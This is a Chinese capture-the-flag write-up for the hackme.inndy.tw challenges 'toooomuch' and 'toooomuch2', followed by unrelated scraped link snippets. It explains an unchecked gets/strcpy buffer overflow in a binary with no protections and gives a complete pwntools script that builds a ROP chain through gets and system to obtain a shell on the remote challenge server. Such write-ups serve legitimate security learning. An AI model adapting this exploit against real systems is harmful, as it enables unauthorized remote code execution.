toooomuch和toooomuch2的wp
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了toooomuch这个题目感觉还不错,我把wp分享出来,方便大家学习
toooomuch的题目要求是:
nc hackme.inndy.tw 7702Can you pass the game?这个题目是一个二分猜测题目,很简单,passcode是硬编码在binary里面的
toooomuch-2的题目要求是:
nc hackme.inndy.tw 7702Get a shell, please.
Tips: Buffer overflow, 0x8048560, shellcodetoooomuch的main函数:
toooomuch函数:
可以看到输入的数据没有任何限制的从gets进入到strcpy中,这里就造成了缓冲区溢出漏洞
再看看程序开启了哪些保护:
可以看到程序没有开任何保护
这个题目可以通过溢出调用gets函数,把/bin/sh写入bss段,然后再利用pop_ret把gets的参数弹出,然后再调用system函数,把bss段的中的/bin/sh传入就可以了
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')def debug(addr = '0x080487D7'):raw_input('debug:')gdb.attach(io, "b *" + addr)shellcode="/bin/sh\0"elf = ELF('/home/h11p/hackme/toooomuch2')
exec_system=elf.plt['system']
print "%x" % exec_system
gets_addr = elf.symbols['gets']
print "%x" % gets_addr
bss_addr = elf.bss()
print "%x" % bss_addr
offset = 28#io = process('/home/h11p/hackme/toooomuch2')io = remote('hackme.inndy.tw', 7702)
pop_ret=0x0804889b #pop_ret
system_addr= 0x08048649payload = 'A' * offset
payload += p32(gets_addr)
payload +=p32(pop_ret)
payload += p32(bss_addr)payload += p32(system_addr)
payload += p32(bss_addr)
payload += p32(0)#debug()
io.sendline(payload)
io.sendline(shellcode)io.interactive()io.close()效果:
toooomuch和toooomuch2的wp相关推荐
- [WP]使用ApacheCordova开发HTML5-WindowsPhone应用程序
下载代码示例 这篇文章介绍 Apache 科尔多瓦,创建使用 HTML5 和 JavaScript,跨平台移动应用程序的框架,并显示了如何使用它为 Windows Phone 开发应用程序. Wind ...
- wp实例开发精品文章源码推荐
qianqianlianmeng wp实例开发精品文章源码推荐 WP8 启动媒体应用 这个示例演示了如何选择正确的msAudioCategory类别的音像(AV)流来配置它作为一个音频 ...
- cocos2d-xna for win8源代码轻松移植cocos-xna for wp游戏
无意间看到杨哥弄了一个cocos2d-xna for win8出来可惜没有放出源代码,我试着要了一下结果他没理我,各种画圈圈. 那我只好自己弄一个了,源代码放出大家供交流学习使用,像杨哥说的一样就是一 ...
- linux 更改wp版本号,代码实现移除 WordPress 版本号
默认情况下,WordPress会在页头输出版本号,有一定安全隐患. 在当前主题的functions.php中添加以下代码,可同时移除feed和js/css中的WordPress版本号: // 同时删除 ...
- 图解 wp WordPress 文章 链接 在新窗口打开
wp WordPress 文章 链接 在新窗口打开 因为wp默认是不在新窗口打开链接的,这对于我们这样习惯关窗口的人,用起来很不方便.其实改起来很简单,下面开始 一.打开外观,选择编辑 二.打开主题页 ...
- 正确设置语言,加速WP应用提交
App Hub在7月18日进行了更新.有些用户反馈新增的默认语言选项有点令人费解.本文简单做个介绍,帮助开发者正确设置语言,加速WP应用提交快速.这次的系统更新后,App Hub可以检 ...
- wordpress必装的插件 wp最常用的十个插件
wordpress是世界上著名的博客系统,简称wp.一般新安装完wordpress以后,往往需要首先安装一些插件,这样才可以使用wordpress的更多功能.wp最常用的十个插件有哪些呢,可能根据每个 ...
- WP老杨解迷:开发生态两极化和榜单乱象
WP老杨解迷:开发生态两极化和榜单乱象 Windows Phone 自2013年的一片浪潮推动下,2014年终于开始引起了各大小CP们的注意,于是大量的产品开始乘风破浪一路涌进Windows Phon ...
- WordPress开发之WP Custom Register Login插件试用
简介 WP Custom Register Login可以为你的WordPress网站前台增加注册.登录.找回密码的功能:你可以通过简码在任何页面上调用. 此外,该插件还支持设置自动通过用户的电子邮件 ...
最新文章
- php header 重定向 url不变_PHP实现页面跳转功能
- A/B测试与灰度发布
- QUIC技术创新 让视频和图片分发再提速
- 潮流趋势UI素材|梯度半透明、透明套件
- 如何备份数据库的某张表_详解mysql数据库如何用mysqldump实现单表备份
- PCA相关 PCL库和Matlab对比
- php utf8 gbk 数组 互转
- 原创|批处理实现安卓设备自动重启压力测试(自动生成日志和计算重启时间)
- SpringCachemanager使用Cache(redis作为缓存中间件)
- IE9环境下。LODOP打印,首次打印时,图片加载不出来、加载不完全问题
- 零基础无经验,该怎么学编程,要学多久?
- Linux性能优化:CPU篇
- 拉灌电流和短路电流测量
- 好书整理系列之-设计模式:可复用面向对象软件的基础 4
- 贝壳谨防长成“极乐鸟”
- 服务器改为电脑要修改什么,怎么样更改电脑服务器名
- 2018.07.19【2018提高组】模拟C组
- 交流负反馈对输入电阻输出电阻的影响
- 法规标准-UN R158标准解读
- Revit如何给模型绑定动画的教程